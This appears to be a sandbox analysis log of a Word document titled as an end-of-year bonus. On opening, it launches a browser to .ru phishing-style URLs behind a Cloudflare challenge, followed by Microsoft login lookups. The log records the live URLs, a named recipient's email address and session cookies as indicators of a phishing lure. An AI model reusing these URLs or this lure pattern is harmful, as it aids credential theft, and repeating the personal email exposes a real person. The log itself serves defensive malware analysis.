Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/ HTTP/1.1Host: gs.quantumdhub.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gs.quantumdhub.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gs.quantumdhub.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gs.quantumdhub.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gs.quantumdhub.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://gs.quantumdhub.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f481fd4183442af&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gs.quantumdhub.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjE5eGdvL0E3UjNaY2RvbzNNSHFIb0E9PSIsInZhbHVlIjoiUE0rdlFSOXUrOVRscWRYQ3ZmdDlmYkJZUzM0UU9ERUMybzZEOVVKbVZaUllkV0JQOXN2TVpjemN4bHVUbTVBMitmdkdLSmErUHU5bVEzczFGWkxiV25aSG9WUDVpSU96YTNIbEI3SlVvSUtmL2tMOC9BUnJsMjRTNW9MakduMEkiLCJtYWMiOiJmY2EzMzdjNmEyZjEzOWVkZmE0OGE0ZTgyYzFlYmNjNGE3MTEwNmQ2NzE4OWQ3YmUwYmRkZjAwNmUyMTNlZTdkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpMd3ViYi9iUDY0TW5FVDFQd3U4Z3c9PSIsInZhbHVlIjoiVGdnUnFaeEU3R3FyN3c5SG9mam1xN2RZNERNaE1BQjdqQjhFdm92N1lVbzI0bWRWTHV4QmV3eWdMVVY1WWFscEVrWGh0M2F0MEpiYlhUenZyckczanVlQVoxMVBnRVFmVjZ3YzR5cXJyMVhRMGY0bHVsc3NSRDFBTHY5eW5XbTkiLCJtYWMiOiIyY2M1ODM1NmRkZTliNGNkZDJhMzllNDNhMDNkMjMxNDViOTEwOTRkZDVkYzM1NzJjOWVjYWM4NTJhZmNjN2NhIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f481fd4183442af&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1775978109:1734617617:EyZoP9ZsFKkpBu9bVNo10nyFoZAd8OdM8YsSiTAyQxg/8f481fd4183442af/4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f481fd4183442af/1734618984616/648a1742b74a790355ded4efe2ab085daee43b16d2974c62784ee075a5e327a9/asbbOwmG_QR4EhL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f481fd4183442af/1734618984617/Jf0Unnedg83rw87 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f481fd4183442af/1734618984617/Jf0Unnedg83rw87 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1775978109:1734617617:EyZoP9ZsFKkpBu9bVNo10nyFoZAd8OdM8YsSiTAyQxg/8f481fd4183442af/4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1775978109:1734617617:EyZoP9ZsFKkpBu9bVNo10nyFoZAd8OdM8YsSiTAyQxg/8f481fd4183442af/4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /310464925672995352ugqKwpWJAGDHWYJSQVQXHKATTCSIZYDMVIKIRN HTTP/1.1Host: vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://gs.quantumdhub.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gs.quantumdhub.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /310464925672995352ugqKwpWJAGDHWYJSQVQXHKATTCSIZYDMVIKIRN HTTP/1.1Host: vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: gs.quantumdhub.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: vacqpb6rdspyrqetrgwvvkqmw7ow7vkt5sbnoesg8yycubxdba.aeeouirl.ru
Source: global trafficDNS traffic detected: DNS query: word.office.com
Source: global trafficDNS traffic detected: DNS query: www.microsoft365.com
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1775978109:1734617617:EyZoP9ZsFKkpBu9bVNo10nyFoZAd8OdM8YsSiTAyQxg/8f481fd4183442af/4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3285sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: 4ofFE0XhC0z5WAQeEBpj4WuFQFzBT9H9oSE9sMGdHfo-1734618980-1.1.1.1-ecTzc1GpiSyvKMBQSDJq8u5FYhAr.z.aa9OrhQGw8qgNf1.4w8WuwOpHiuyPMPm3sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 14:36:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6rM%2BDxF2KXBxp70hbns%2BP4nKj0uXQiqt5MX1Dqo4McVJjxDTewf9%2BLi9aBksM2KAz8wPydkmdKzPGl0%2BDyCjbhx5KjCKy6bhKxPqXeylL1LCwSxm4l2CszF07jf6BA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1160&min_rtt=1141&rtt_var=358&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2148&delivery_rate=2282111&cwnd=251&unsent_bytes=0&cid=38652e94931a4a52&ts=139&x=0"CF-Cache-Status: HITAge: 6187Server: cloudflareCF-RAY: 8f481fe49e2c729f-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1936&min_rtt=1926&rtt_var=742&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1925&delivery_rate=1454183&cwnd=169&unsent_bytes=0&cid=1c86ca8961932d23&ts=9244&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 14:36:26 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: kzP4ENNraJ7L5lvIFkMhS1sRKuDePW099Bc=$Ds/ylfprOtH/ghZkServer: cloudflareCF-RAY: 8f481ffc6cbe41cd-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 14:36:33 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: uSXDzmaePtOnGNrKFWA5tjhWhiB/H+y4uww=$UrAu0um6ELqEL9Ikcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f482023780442a3-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 14:37:40 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: I4/C4llV/uU4f3Bqbwpij5k5HhHRWjnRndk=$+N8A5uujZaTm+2Jdcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f4821c8eb8618f2-EWRalt-svc: h3=":443"; ma=86400
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: chromecache_125.7.dr, chromecache_116.7.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_125.7.dr, chromecache_116.7.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: classification engineClassification label: mal56.winDOCX@21/93@38/11
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\OfficeJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{C9955036-852D-450C-8F44-56113DDA14CF} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\Gioia Faggioli-End Of Year-Bonus.docx" /o ""
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://gs.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/#Xgioia.faggioli@modula.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1928,i,6146988213687095418,5572660784010154810,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
